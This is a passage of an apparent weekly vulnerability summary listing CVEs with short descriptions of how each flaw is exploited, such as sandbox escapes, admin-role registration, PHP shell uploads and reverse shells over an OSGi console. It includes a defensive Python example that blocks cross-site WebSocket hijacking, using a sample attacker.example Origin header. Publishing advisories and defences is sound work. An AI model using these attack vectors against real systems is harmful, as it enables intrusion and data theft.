| Intel[.]com--Intel platforms | Improper initialization in the UEFI firmware for some Intel platforms within Ring 0: Bare Metal OS may allow an information disclosure. System software adversary with a privileged user combined with a high complexity attack may enable data exposure. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (high), integrity (none) and availability (none) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts. | 2026-05-12 | not yet calculated | CVE-2025-35991 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01413.html |
| Intel[.]com--Display Virtualization for Windows OS driver software | Improper buffer restrictions for some Display Virtualization for Windows OS driver software within Ring 2: Device Drivers may allow a denial of service. Unprivileged software adversary with an authenticated user combined with a low complexity attack may enable denial of service. This result may potentially occur via local access when attack requirements are not present without special internal knowledge and requires no user interaction. The potential vulnerability may impact the confidentiality (none), integrity (none) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts. | 2026-05-12 | not yet calculated | CVE-2025-36510 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01430.html |
| Intel[.]com--AI Playground software | Uncontrolled search path for some AI Playground software before version 3.0.0 alpha within Ring 3: User Applications may allow an escalation of privilege. Unprivileged software adversary with an authenticated user combined with a high complexity attack may enable escalation of privilege. This result may potentially occur via local access when attack requirements are present without special internal knowledge and requires active user interaction. The potential vulnerability may impact the confidentiality (high), integrity (high) and availability (high) of the vulnerable system, resulting in subsequent system confidentiality (none), integrity (none) and availability (none) impacts. | 2026-05-12 | not yet calculated | CVE-2025-36515 | https://intel.com/content/www/us/en/security-center/advisory/intel-sa-01438.html |
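The Garmin WDU rows above describe two failures on one WebSocket endpoint: no origin check, so a page on an attacker's site can ride the victim browser's network position and credentials into the device (CVE-2025-27851), and no authentication on the socket itself, so any client on the segment can call the remote API directly (CVE-2025-27853). As an added example, not Garmin's code, here is a handshake gate that closes both: the `Origin` header, when present, must match an allowlist (browsers always send it on a WebSocket upgrade, so a cross-site page cannot get past it), and a valid session must be presented on the socket, with administrative commands additionally restricted by role. The session store, cookie name `wdu_session`, allowed origins, command names and sample headers are all constructed for this example.

```python
from dataclasses import dataclass
from typing import Optional


@dataclass(frozen=True)
class Session:
    token: str
    role: str  # "viewer" or "admin"


# Constructed session store; a real server would issue these at login.
SESSIONS = {
    "s3ssion-view-0001": Session("s3ssion-view-0001", "viewer"),
    "s3ssion-admin-0002": Session("s3ssion-admin-0002", "admin"),
}
# Origins the device's own UI is served from (assumed values).
ALLOWED_ORIGINS = {"http://192.168.10.5", "http://wdu.local"}
# Commands that change device state and must never run for a viewer session.
ADMIN_COMMANDS = {"set_network", "set_password", "factory_reset"}


def _session_from_cookie(cookie_header: str) -> Optional[Session]:
    """Look up the session named in the Cookie header, if any."""
    for part in cookie_header.split(";"):
        name, _, value = part.strip().partition("=")
        if name == "wdu_session":
            return SESSIONS.get(value)
    return None


def authorize_handshake(headers: dict):
    """Decide whether a WebSocket upgrade may proceed.

    Returns (session, reason). A None session means the upgrade is refused.
    Order matters: a forbidden Origin is rejected even if the browser attached a
    perfectly valid cookie, which is exactly the cross-site hijacking case.
    """
    h = {k.lower(): v for k, v in headers.items()}
    if h.get("upgrade", "").lower() != "websocket":
        return None, "not a websocket upgrade"
    origin = h.get("origin")
    if origin is not None and origin not in ALLOWED_ORIGINS:
        return None, f"origin {origin} not allowed"
    sess = _session_from_cookie(h.get("cookie", ""))
    if sess is None:
        # Authentication lives on the socket, not only in the page's JavaScript.
        return None, "no valid session on the socket"
    return sess, "ok"


def authorize_command(sess: Session, command: str) -> bool:
    """Per-message check applied after the handshake succeeded."""
    if command in ADMIN_COMMANDS:
        return sess.role == "admin"
    return True


# Constructed handshakes.
# 1. A page on attacker.example opened a socket to the device; the browser
#    attached the admin's cookie automatically, but the Origin gives it away.
HIJACK = {
    "Upgrade": "websocket",
    "Origin": "https://attacker.example",
    "Cookie": "wdu_session=s3ssion-admin-0002",
}
# 2. A non-browser client (websocat, a script) talking to the API directly:
#    no Origin, no credential.
DIRECT_UNAUTH = {"Upgrade": "websocket"}
# 3. The device's own UI with a viewer session.
LEGIT_VIEWER = {
    "Upgrade": "websocket",
    "Origin": "http://wdu.local",
    "Cookie": "wdu_session=s3ssion-view-0001",
}

if __name__ == "__main__":
    for name, hdrs in (("hijack", HIJACK), ("direct", DIRECT_UNAUTH), ("viewer", LEGIT_VIEWER)):
        sess, why = authorize_handshake(hdrs)
        print(name, why, sess and authorize_command(sess, "set_password"))
```

The Origin check is only a defence against browsers, which is the population cross-site hijacking targets; it says nothing about a client that sets its own headers. That is why the cookie check is not optional when Origin is absent, and why the role check runs on every message rather than once at connect time.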
Vulnerability Summary for the Week of May 4, 2026
Posted on Monday May 11, 2026
| Primary Vendor -- Product | Description | Published | CVSS Score | Source Info | Patch Info |
|---|---|---|---|---|---|
| gotenberg--gotenberg | Gotenberg is a Docker-powered stateless API for PDF files. In versions 8.30.1 and earlier, the metadata write endpoint validates metadata keys for control characters but leaves metadata values unsanitized. A newline character in a metadata value splits the ExifTool stdin line into two separate arguments, allowing injection of arbitrary ExifTool pseudo-tags such as -FileName, -Directory, -SymLink, and -HardLink. This is a bypass of the incomplete key-sanitization fix introduced in v8.30.1. An unauthenticated attacker can rename or move any PDF being processed to an arbitrary path in the container filesystem, overwrite arbitrary files, or create symlinks and hard links at arbitrary paths. | 2026-05-06 | 10 | CVE-2026-40281 | https://github.com/gotenberg/gotenberg/security/advisories/GHSA-q7r4-hc83-hf2q https://github.com/gotenberg/gotenberg/commit/405f1069c026bb08f319fb5a44e5c67c33208318 |
| jkroepke--openvpn-auth-oauth2 | openvpn-auth-oauth2 is a plugin/management interface client for OpenVPN server to handle an OIDC based single sign-on (SSO) auth flows. From version 1.26.3 to before version 1.27.3, when openvpn-auth-oauth2 is deployed in the experimental plugin mode (shared library loaded by OpenVPN via the plugin directive), clients that do not support WebAuth/SSO (e.g., the openvpn CLI on Linux) are incorrectly admitted to the VPN despite being denied by the authentication logic. The default management-interface mode is not affected because it does not use the OpenVPN plugin return-code mechanism. This issue has been patched in version 1.27.3. | 2026-05-08 | 10 | CVE-2026-41070 | https://github.com/jkroepke/openvpn-auth-oauth2/security/advisories/GHSA-246w-jgmq-88fg https://github.com/jkroepke/openvpn-auth-oauth2/commit/36f69a6c67c1054da7cbfa04ced3f0555127c8f2 |
| gitroomhq--postiz-app | Postiz is an AI social media scheduling tool. Prior to commit da44801, a "Pwn Request" vulnerability in the Build and Publish PR Docker Image workflow (.github/workflows/pr-docker-build.yml) allows any unauthenticated user to execute arbitrary code during the Docker build process and exfiltrate a highly privileged GITHUB_TOKEN (write-all permissions). This can be achieved simply by opening a Pull Request from a fork with a maliciously modified Dockerfile.dev. This issue has been patched via commit da44801. | 2026-05-08 | 10 | CVE-2026-42298 | https://github.com/gitroomhq/postiz-app/security/advisories/GHSA-v975-9h5p-xhm4 https://github.com/gitroomhq/postiz-app/commit/da448012dd87e94944cbe83a38e7fd023269ec46 |
| GeoVision Inc.--GV-VMS V20.0.2 | GV-VMS V20 is video monitoring software used to gather the feeds of many surveillance cameras and manage other security devices. It is a native application accessed locally, but remote access can also be enabled via the "WebCam Server" feature. Once enabled, the management and monitoring features can be reached through a regular web interface. This web server is another native application, compiled without ASLR, which makes exploitation much easier and more likely. Most of the features require authentication before being reachable and use a standard login page to grant access. However, the `gvapi` endpoint uses its own authentication mechanism via an `HTTP Authorization` header, supporting both the `Basic` and `Digest` authentication modes. Stack overflow via unbounded copy of a base64-decoded string: the `b64decoder` string is sized dynamically, but it is then copied into the `Buffer` stack variable one character at a time at [0], with no bounds check. If the decoded string is longer than 256 characters (the size of the `Buffer` variable), a stack overflow occurs. Because the data is fully attacker-controlled and ASLR is absent, this vulnerability can easily be exploited to gain full code execution as SYSTEM on the machine running the service. | 2026-05-04 | 10 | CVE-2026-42369 | https://www.geovision.com.tw/cyber_security.php https://talosintelligence.com/vulnerability_reports/ |
| Microsoft--Azure DevOps | Exposure of sensitive information to an unauthorized actor in Azure DevOps allows an unauthorized attacker to disclose information over a network. | 2026-05-07 | 10 | CVE-2026-42826 | Azure DevOps Information Disclosure Vulnerability |
| Eclipse Foundation--Eclipse BaSyx | In Eclipse BaSyx Java Server SDK versions prior to 2.0.0-milestone-10, inadequate path normalization in the Submodel HTTP API allows an unauthenticated remote attacker to perform a path traversal attack. By supplying a maliciously crafted fileName parameter during a file upload operation, an attacker can bypass intended storage boundaries and write arbitrary files to any location on the host filesystem accessible by the Java process. This can lead to Remote Code Execution (RCE) and complete system compromise. | 2026-05-05 | 10 | CVE-2026-7411 | https://gitlab.eclipse.org/security/vulnerability-reports/-/issues/423 https://gitlab.eclipse.org/security/cve-assignment/-/issues/102 |
| Opencart--opencart | OpenCart 3.0.3.8 contains a session fixation vulnerability that allows attackers to hijack user sessions by injecting arbitrary values into the OCSESSID cookie. Attackers can set malicious OCSESSID cookie values that the server accepts and maintains, enabling session takeover and unauthorized access to user accounts. | 2026-05-10 | 9.8 | CVE-2021-47923 | ExploitDB-50555 Official Product Homepage VulnCheck Advisory: OpenCart 3.0.3.8 Session Fixation via OCSESSID Cookie |
| thecartpress--TheCartPress | WordPress TheCartPress 1.5.3.6 contains an unauthenticated privilege escalation vulnerability that allows attackers to create administrator accounts by submitting crafted requests to the AJAX handler. Attackers can send POST requests to the tcp_register_and_login_ajax action with tcp_role set to administrator to gain full administrative access without authentication. | 2026-05-10 | 9.8 | CVE-2021-47932 | ExploitDB-50378 Official Product Homepage VulnCheck Advisory: WordPress TheCartPress 1.5.3.6 Privilege Escalation Unauthenticated |
| mstore--MStore API | WordPress MStore API 2.0.6 contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious files by sending POST requests to the REST API endpoint. Attackers can upload PHP files with arbitrary names to the config_file endpoint to achieve remote code execution on the server. | 2026-05-10 | 9.8 | CVE-2021-47933 | ExploitDB-50379 Official Product Homepage VulnCheck Advisory: WordPress MStore API 2.0.6 Arbitrary File Upload |
| Opencats--OpenCATS | OpenCATS 0.9.4 contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by uploading malicious PHP files disguised as resume attachments. Attackers can upload PHP payloads through the careers job application endpoint and execute system commands via POST requests to the uploaded file in the upload directory. | 2026-05-10 | 9.8 | CVE-2021-47936 | ExploitDB-50585 Official Product Homepage Product Reference VulnCheck Advisory: OpenCATS 0.9.4 Remote Code Execution via Resume Upload |
| download-from-files--Download From Files | WordPress Plugin Download From Files version 1.48 and earlier contains an arbitrary file upload vulnerability that allows unauthenticated attackers to upload malicious files by exploiting the AJAX fileupload action. Attackers can send POST requests to the admin-ajax.php endpoint with the download_from_files_617_fileupload action, manipulating the allowExt parameter to bypass file type restrictions and upload executable files like PHP shells to the web root. | 2026-05-10 | 9.8 | CVE-2021-47940 | ExploitDB-50287 Official Product Homepage VulnCheck Advisory: WordPress Download From Files 1.48 Arbitrary File Upload |
| equinox--OSGi | Eclipse Equinox OSGi versions 3.8 through 3.18 contain a remote code execution vulnerability in the console interface that allows unauthenticated attackers to execute arbitrary code by exploiting the fork command functionality. Attackers can establish a telnet connection to the OSGi console, perform a telnet handshake, and send fork commands to download and execute malicious Java code, establishing a reverse shell connection. | 2026-05-05 | 9.8 | CVE-2023-54342 | ExploitDB-51878 VulnCheck Advisory: Eclipse Equinox OSGi 3.8-3.18 Console Remote Code Execution |
| equinox--OSGi | Eclipse Equinox OSGi 3.7.2 and earlier contains a remote code execution vulnerability that allows unauthenticated attackers to execute arbitrary commands by sending payloads to the console interface. Attackers can connect to the OSGi console port and send base64-encoded bash commands wrapped in fork directives to achieve code execution and establish reverse shell connections. | 2026-05-05 | 9.8 | CVE-2023-54344 | ExploitDB-51879 VulnCheck Advisory: Eclipse Equinox OSGi 3.7.2 Remote Code Execution via Console |
| dreamstechnologies--Mentoring | The Mentoring plugin for WordPress is vulnerable to privilege escalation in all versions up to, and including, 1.2.8. This is due to the plugin not properly restricting the roles that users can register with in the mentoring_process_registration() function. This makes it possible for unauthenticated attackers to register with administrator-level user accounts. | 2026-05-05 | 9.8 | CVE-2025-13618 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7192fb4c-0434-4e11-a2a7-c205b8d6b68e?source=cve https://themeforest.net/item/mentoring-education-wordpress-theme/36457081 https://mentoring-wp.dreamsmarketplace.com/documentation/changelog.html |
| Tegsoft Management and Information Services Trade Limited Company--Online Support Application | Improper neutralization of input during web page generation ('cross-site scripting') vulnerability in Tegsoft Management and Information Services Trade Limited Company Online Support Application allows Reflected XSS. This issue affects Online Support Application: from V3 through 31122025. | 2026-05-04 | 9.8 | CVE-2025-14320 | https://www.usom.gov.tr/bildirim/tr-26-0142 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, VM2 suffers from a sandbox breakout vulnerability. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.0. | 2026-05-04 | 9.8 | CVE-2026-24118 | https://github.com/patriksimek/vm2/security/advisories/GHSA-grj5-jjm8-h35p https://github.com/patriksimek/vm2/commit/2b5f3e3a060d9088f5e1cdd585d683d491f990a3 https://github.com/patriksimek/vm2/commit/f9b700b1c7d9ef2df416666cb24e0b659140cc74 https://github.com/patriksimek/vm2/releases/tag/v3.11.0 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.10.5, the fix for CVE-2023-37466 is insufficient and can be circumvented allowing attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.10.5. | 2026-05-04 | 9.8 | CVE-2026-24120 | https://github.com/patriksimek/vm2/security/advisories/GHSA-qvjj-29qf-hp7p https://github.com/patriksimek/vm2/releases/tag/v3.10.5 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, VM2 suffers from a sandbox breakout vulnerability through the inspect function. This allows attackers to write code which can escape from the VM2 sandbox and execute arbitrary commands on the host system. This issue has been patched in version 3.11.0. | 2026-05-04 | 9.8 | CVE-2026-24781 | https://github.com/patriksimek/vm2/security/advisories/GHSA-v37h-5mfm-c47c https://github.com/patriksimek/vm2/commit/8d30d93213c1898b3e035298b89a814970dd1189 https://github.com/patriksimek/vm2/commit/bdd3d15e57bc4ec5e70365cd79f7cb0256e5f88c https://github.com/patriksimek/vm2/commit/fd266d084e0a3322d0f71ba2a8dc4c96cd030228 https://github.com/patriksimek/vm2/releases/tag/v3.11.0 |
| Qualcomm, Inc.--Snapdragon | Buffer overflow due to incorrect authorization in PLC FW | 2026-05-04 | 9.6 | CVE-2026-25293 | https://docs.qualcomm.com/product/publicresources/securitybulletin/may-2026-bulletin.html |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. Prior to version 3.11.0, SuppressedError allows attackers to escape the sandbox and run arbitrary code. This issue has been patched in version 3.11.0. | 2026-05-04 | 9.8 | CVE-2026-26332 | https://github.com/patriksimek/vm2/security/advisories/GHSA-55hx-c926-fr95 https://github.com/patriksimek/vm2/releases/tag/v3.11.0 |
| patriksimek--vm2 | vm2 is an open source vm/sandbox for Node.js. In version 3.10.4, vm2 is vulnerable to full sandbox escape with arbitrary code execution. Attacker code inside VM.run() obtains host process object and runs host commands with zero host cooperation. This issue has been patched in version 3.10.5. | 2026-05-04 | 9.8 | CVE-2026-26956 | https://github.com/patriksimek/vm2/security/advisories/GHSA-ffh4-j6h5-pg66 https://github.com/patriksimek/vm2/releases/tag/v3.10.5 |
| OpenCTI-Platform--opencti | OpenCTI is an open source platform for managing cyber threat intelligence knowledge and observables. In versions 6.6.0 through 6.9.12, there is a privilege escalation vulnerability that can be exploited by unauthenticated attackers to query the API as any existing user, including the default admin account. This issue has been fixed in version 6.9.13. As a workaround, the default admin can be disabled using the `APP__ADMIN__EXTERNALLY_MANAGED` configuration. | 2026-05-05 | 9.8 | CVE-2026-27960 | https://github.com/OpenCTI-Platform/opencti/security/advisories/GHSA-6vvv-vmfr-xhrx |
| Microsoft--Azure Managed Instance for Apache Cassandra | Improper access control in Azure Managed Instance for Apache Cassandra allows an authorized attacker to execute code over a network. | 2026-05-07 | 9.9 | CVE-2026-33109 | Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability |
| Microsoft--Microsoft Teams | Improper authorization in Microsoft Teams allows an authorized attacker to disclose information over a network. | 2026-05-07 | 9.6 | CVE-2026-33823 | Microsoft Team Events Portal Information Disclosure Vulnerability |
| Microsoft--Azure Managed Instance for Apache Cassandra | Improper input validation in Azure Managed Instance for Apache Cassandra allows an authorized attacker to execute code over a network. | 2026-05-07 | 9 | CVE-2026-33844 | Azure Managed Instance for Apache Cassandra Remote Code Execution Vulnerability |
| Microsoft--Azure Cloud Shell | Improper neutralization of special elements used in a command ('command injection') in Azure Cloud Shell allows an unauthorized attacker to perform spoofing over a network. | 2026-05-07 | 9.6 | CVE-2026-35428 | Azure Cloud Shell Spoofing Vulnerability |
| Saleswonder LLC--WebinarIgnition | Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection') vulnerability in Saleswonder LLC WebinarIgnition allows Blind SQL Injection. This issue affects WebinarIgnition: from n/a through 4.08.253. | 2026-05-05 | 9.3 | CVE-2026-40797 | https://patchstack.com/database/wordpress/plugin/webinar-ignition/vulnerability/wordpress-webinarignition-plugin-4-06-08-sql-injection-vulnerability?_s_id=cve |
| Spring--Spring Cloud Config | Spring Cloud Config allows applications to serve arbitrary text and binary files through the spring-cloud-config-server module. A malicious user, or attacker, can send a request using a specially crafted URL that can lead to a directory traversal attack. Spring Cloud Config 3.1.x: affected from 3.1.0 through 3.1.13 (inclusive); upgrade to 3.1.14 or greater (Enterprise Support Only). Spring Cloud Config 4.1.x: affected from 4.1.0 through 4.1.9 (inclusive); upgrade to 4.1.10 or greater (Enterprise Support Only). Spring Cloud Config 4.2.x: affected from 4.2.0 through 4.2.6 (inclusive); upgrade to 4.2.7 or greater (Enterprise Support Only). Spring Cloud Config 4.3.x: affected from 4.3.0 through 4.3.2 (inclusive); upgrade to 4.3.3 or greater. Spring Cloud Config 5.0.x: affected from 5.0.0 through 5.0.2 (inclusive); upgrade to 5.0.3 or greater. | 2026-05-07 | 9.1 | CVE-2026-40982 | https://spring.io/security/cve-2026-40982 |
| ci4-cms-erp--ci4ms | CI4MS is a CodeIgniter 4-based CMS skeleton that delivers a production-ready, modular architecture with RBAC authorization and theme support. In version 0.31.4.0, an attacker can achieve full account takeover and privilege escalation via a stored DOM XSS in the backup module's filename field: a crafted SQL backup file is given a file name that carries a hidden XSS payload. This issue has been patched in version 0.31.5.0. | 2026-05-07 | 9.1 | CVE-2026-41201 | https://github.com/ci4-cms-erp/ci4ms/security/advisories/GHSA-qxpq-82f3-xj47 https://github.com/ci4-cms-erp/ci4ms/releases/tag/0.31.5.0 |
| MervinPraison--PraisonAI | PraisonAI is a multi-agent teams system. Prior to version 4.6.9, the fix for PraisonAI's MCP command handling does not add a command allowlist or argument validation to parse_mcp_command(), allowing arbitrary executables like bash, python, or /bin/sh with inline code execution flags to pass through to subprocess execution. This issue has been patched in version 4.6.9. | 2026-05-08 | 9.8 | CVE-2026-41497 | https://github.com/MervinPraison/PraisonAI/security/advisories/GHSA-9qhq-v63v-fv3j https://github.com/MervinPraison/PraisonAI/commit/47bff65413beaa3c21bf633c1fae4e684348368c |
| electerm--electerm | electerm is an open-source terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to version 3.3.8, a command injection vulnerability exists in github.com/electerm/electerm/npm/install.js:150. The runMac() function appends the attacker-controlled remote releaseInfo.name directly into an exec("open ...") command without validation. This issue has been patched in version 3.3.8. | 2026-05-08 | 9.8 | CVE-2026-41500 | https://github.com/electerm/electerm/security/advisories/GHSA-wxw2-rwmh-vr8f https://github.com/electerm/electerm/commit/59708b38c8a52f5db59d7d4eff98e31d573128ee https://github.com/electerm/electerm/releases/tag/v3.3.8 |
| electerm--electerm | electerm is an open-source terminal/ssh/sftp/telnet/serialport/RDP/VNC/Spice/ftp client. Prior to version 3.3.8, a command injection vulnerability exists in github.com/electerm/electerm/npm/install.js:130. The runLinux() function appends attacker-controlled remote version strings directly into an exec("rm -rf ...") command without validation. This issue has been patched in version 3.3.8. | 2026-05-08 | 9.8 | CVE-2026-41501 | https://github.com/electerm/electerm/security/advisories/GHSA-8x35-hph8-37hq https://github.com/electerm/electerm/commit/59708b38c8a52f5db59d7d4eff98e31d573128ee https://github.com/electerm/electerm/releases/tag/v3.3.8 |
| mauriciopoppe--math-codegen | math-codegen generates code from mathematical expressions. Prior to version 0.4.3, string literal content passed to cg.parse() is injected verbatim into a new Function() body without sanitization. This allows an attacker to execute arbitrary system commands when user-controlled input reaches the parser. Any application exposing a math evaluation endpoint where user input flows into cg.parse() is vulnerable to full RCE. This issue has been patched in version 0.4.3. | 2026-05-08 | 9.8 | CVE-2026-41507 | https://github.com/mauriciopoppe/math-codegen/security/advisories/GHSA-p6x5-p4xf-cc4r https://github.com/mauriciopoppe/math-codegen/pull/11 https://github.com/mauriciopoppe/math-codegen/commit/4bb52d3030683362b3559ee8dd91350555a05f6b |
| 0din-ai--ai-scanner | ai-scanner is an AI model safety scanner built on NVIDIA garak. From version 1.0.0 to before version 1.4.1, there is a remote code execution vulnerability via JavaScript injection in `BrowserAutomation::PlaywrightService`. This issue has been patched in version 1.4.1. | 2026-05-08 | 9.9 | CVE-2026-41512 | https://github.com/0din-ai/ai-scanner/security/advisories/GHSA-r27j-xxgx-f5vr https://github.com/0din-ai/ai-scanner/releases/tag/v1.4.1 |
| enchant97--note-mark | Note Mark is an open-source note-taking application. In version 0.19.2, IsPasswordMatch in backend/db/models.go falls back to a hard-coded bcrypt("null") placeholder whenever a user has no stored password. OIDC-registered users are created with an empty password, so anyone who submits password: "null" to the internal login endpoint receives a valid session for that user. The bypass is unauthenticated and requires no user interaction. This issue has been patched in version 0.19.3. | 2026-05-04 | 9.4 | CVE-2026-41571 | https://github.com/enchant97/note-mark/security/advisories/GHSA-pxf8-6wqm-r6hh https://github.com/enchant97/note-mark/releases/tag/v0.19.3 |
| inducer--relate | RELATE is a web-based courseware package. Prior to commit 2f68e16, there is a timing attack vulnerability in course/auth.py - check_sign_in_key(). This issue has been patched via commit 2f68e16. | 2026-05-08 | 9 | CVE-2026-41588 | https://github.com/inducer/relate/security/advisories/GHSA-78j7-9xr9-2728 https://github.com/inducer/relate/commit/2f68e16cd3b96d25c188c1aa3f7e13cdb15cdaeb |
| charmbracelet--wish | Wish is an SSH server with defaults and a collection of middlewares. From version 2.0.0 to before version 2.0.1, the SCP middleware in charm.land/wish/v2 is vulnerable to path traversal attacks. A malicious SCP client can read arbitrary files from the server, write arbitrary files to the server, and create directories outside the configured root directory by sending crafted filenames containing ../ sequences over the SCP protocol. This issue has been patched in version 2.0.1. | 2026-05-07 | 9.6 | CVE-2026-41589 | https://github.com/charmbracelet/wish/security/advisories/GHSA-xjvp-7243-rg9h https://github.com/charmbracelet/wish/releases/tag/v2.0.1 |
| freescout-help-desk--freescout | FreeScout is a free help desk and shared inbox built with PHP's Laravel framework. Prior to version 1.8.217, the /user-setup/{hash} endpoint accepts a 60-character random invite_hash to set a new user's password. The endpoint performs no expiration check - the hash remains valid indefinitely until consumed. Combined with realistic hash-leakage scenarios (forwarded invite emails, HTTP referrer to external CDNs on the setup page, server-side log exposure, abandoned invite emails in shared inboxes), this enables unauthenticated permanent account takeover months or years after invite issuance. If the leaked invite was sent to an admin, the takeover yields admin access. This issue has been patched in version 1.8.217. | 2026-05-07 | 9.1 | CVE-2026-41902 | https://github.com/freescout-help-desk/freescout/security/advisories/GHSA-hqff-cwx7-3jpm https://github.com/freescout-help-desk/freescout/releases/tag/1.8.217 |
| givanz--Vvveb | Vvveb before version 1.0.8.2 contains a hard-coded credentials vulnerability in its docker-compose-apache.yaml configuration that allows unauthenticated attackers to access the bundled phpMyAdmin container with pre-configured database credentials. Attackers can connect to the phpMyAdmin port to gain unrestricted read and write access to the entire Vvveb database, including administrator password hashes, customer personally identifiable information, and order data, enabling account takeover and data manipulation. | 2026-05-06 | 9.8 | CVE-2026-41930 | https://github.com/givanz/Vvveb/releases/tag/1.0.8.2 https://github.com/givanz/Vvveb/security/advisories/GHSA-g38h-mr9p-fjmf https://github.com/givanz/Vvveb/commit/f85ca7c2bc389bda3cc2eca87b2514581a628c32 https://www.vulncheck.com/advisories/vvveb-hard-coded-credentials-information-disclosure-via-phpmyadmin |
| orneryd--NornicDB | NornicDB is a distributed, low-latency graph-plus-vector database with temporal MVCC and sub-millisecond HNSW search, graph traversal and writes. Prior to version 1.0.42-hotfix, the --address CLI flag (and NORNICDB_ADDRESS / server.host config key) is plumbed through to the HTTP server correctly but never reaches the Bolt server config. The Bolt listener therefore always binds to the wildcard address (all interfaces), regardless of what the user configures. On a LAN, this exposes the graph database, with its default admin:password credentials, to any device sharing the network. This issue has been patched in version 1.0.42-hotfix. | 2026-05-08 | 9.8 | CVE-2026-42072 | https://github.com/orneryd/NornicDB/security/advisories/GHSA-2hp7-65r3-wv54 https://github.com/orneryd/NornicDB/commit/adce4f9a9fc7b6aada07c0bfa2d737cd7a6efaca https://github.com/orneryd/NornicDB/releases/tag/v1.0.42 |
| EvoMap--evolver | Evolver is a GEP-powered self-evolving engine for AI agents. Prior to version 1.69.3, a command injection vulnerability in the _extractLLM() function allows attackers to execute arbitrary shell commands on the server. The function constructs a curl command using string concatenation and passes it to execSync() without proper sanitization, enabling remote code execution when the corpus parameter contains shell metacharacters. This issue has been patched in version 1.69.3. | 2026-05-04 | 9.8 | CVE-2026-42076 | https://github.com/EvoMap/evolver/security/advisories/GHSA-j5w5-568x-rq53 https://github.com/EvoMap/evolver/releases/tag/v1.69.3 |
| OpenC3--cosmos | OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. From version 6.7.0 to before version 7.0.0-rc3, a SQL injection vulnerability exists in the Time-Series Database (TSDB) component of COSMOS. The tsdb_lookup function in the cvt_model.rb file directly places user-supplied input into a SQL query without sanitizing the input. As a result, a user can break out of the initial SQL statement and execute arbitrary SQL commands, including deleting data. This issue has been patched in version 7.0.0-rc3. | 2026-05-04 | 9.6 | CVE-2026-42087 | https://github.com/OpenC3/cosmos/security/advisories/GHSA-v529-vhwc-wfc5 https://github.com/OpenC3/cosmos/commit/9ba60c09c8836a37a2e4ea67ab35fe403e041415 https://github.com/OpenC3/cosmos/releases/tag/v7.0.0-rc3 |
| OpenC3--cosmos | OpenC3 COSMOS provides the functionality needed to send commands to and receive data from one or more embedded systems. Prior to version 7.0.0-rc3, the Script Runner widget allows users to execute Python and Ruby scripts directly from the openc3-COSMOS-script-runner-api container. Because all the docker containers share a network, users can execute specially crafted scripts to bypass the API permissions check and perform administrative actions, including reading and modifying data inside the Redis database, which can be used to read secrets and change COSMOS settings, as well as read and write to the buckets service, which holds configuration, log, and plugin files. These actions are normally only available from the Admin Console or with administrative privileges. Any user with permission to create and run scripts can connect to any service in the docker network. This issue has been patched in version 7.0.0-rc3. | 2026-05-04 | 9.6 | CVE-2026-42088 | https://github.com/OpenC3/cosmos/security/advisories/GHSA-2wvh-87g2-89hr https://github.com/OpenC3/cosmos/releases/tag/v7.0.0 https://github.com/OpenC3/cosmos/releases/tag/v7.0.0-rc3 |
| streetwriters--notesnook | Notesnook is a note-taking app focused on user privacy & ease of use. Prior to Notesnook Web/Desktop version 3.3.15 and prior to Notesnook iOS/Android version 3.3.20, a stored XSS vulnerability in the note export flow can be escalated to remote code execution in the desktop app. The root cause is that exported note fields such as title, headline, and content are inserted into the generated HTML template without HTML escaping. When the note is later exported to PDF, Notesnook renders that HTML into a same-origin, unsandboxed iframe using iframe.srcdoc = .... Injected script executes in the Notesnook origin. In the desktop app, this becomes RCE because Electron is configured with nodeIntegration: true and contextIsolation: false. This issue has been patched in Notesnook Web/Desktop version 3.3.15 and Notesnook iOS/Android version 3.3.20. | 2026-05-04 | 9.6 | CVE-2026-42090 | https://github.com/streetwriters/notesnook/security/advisories/GHSA-fjm8-jg78-89h4 https://github.com/streetwriters/notesnook/releases/tag/3.3.20-android https://github.com/streetwriters/notesnook/releases/tag/v3.3.15 |
| useplunk--plunk | Plunk is an open-source email platform built on top of AWS SES. Prior to version 0.9.0, the /webhooks/sns endpoint accepts Amazon SNS notification payloads from unauthenticated requests without verifying the SNS signature, certificate, or topic ARN, meaning anyone can forge a valid-looking webhook request. This allows an unauthenticated attacker to spoof SNS events to trigger workflow automations, unsubscribe contacts, manipulate email delivery metrics, and potentially exhaust billing credits. This issue has been patched in version 0.9.0. | 2026-05-08 | 9.1 | CVE-2026-42193 | https://github.com/useplunk/plunk/security/advisories/GHSA-9792-w86v-gx53 https://github.com/useplunk/plunk/releases/tag/v0.9.0 |
| labring--FastGPT | FastGPT is an AI Agent building platform. From version 4.14.10 to before version 4.14.13, the agent-sandbox component of FastGPT is vulnerable to unauthenticated Remote Code Execution (RCE). The startup script entrypoint.sh initializes code-server with the --auth none flag and binds the service to all network interfaces (0.0.0.0:8080). This configuration allows any user with network access to the port to bypass authentication and gain full control over the sandbox environment. This issue has been patched in version 4.14.13. | 2026-05-08 | 9.8 | CVE-2026-42302 | https://github.com/labring/FastGPT/security/advisories/GHSA-34rc-438g-7w78 https://github.com/labring/FastGPT/pull/6781 https://github.com/labring/FastGPT/commit/9d1cafce9241430fb5bcdd646455055c5f4ae0a4 https://github.com/labring/FastGPT/releases/tag/v4.14.13 |
